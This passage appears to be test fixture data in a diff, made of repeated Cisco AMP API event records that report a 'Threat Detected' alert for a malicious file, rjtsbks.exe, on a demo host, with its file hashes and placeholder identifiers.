Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163608","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":644000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":629000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":598000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":535000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":520000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163592","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163591","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163590","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163589","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163588","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163587","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
